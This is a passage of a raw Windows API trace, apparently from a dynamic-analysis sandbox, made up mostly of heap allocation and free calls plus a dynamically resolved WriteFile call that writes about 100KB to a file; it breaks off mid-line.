[0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0171.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0171.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0171.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0171.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0171.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0171.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0171.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0171.034] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0171.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0171.034] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0171.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0171.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0171.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0171.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0171.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0171.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0171.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0171.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0171.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0171.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0171.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0171.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0171.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0171.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0171.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0171.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0171.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0171.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0171.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0171.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0171.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0171.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0171.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0171.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0171.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0171.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0171.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0171.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0171.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.041] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0171.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd330, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.041] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0171.042] WriteFile (in: hFile=0x120, lpBuffer=0xa5f008*, nNumberOfBytesToWrite=0x1880e, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesWritten=0x87eae0*=0x1880e, lpOverlapped=0x0) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: 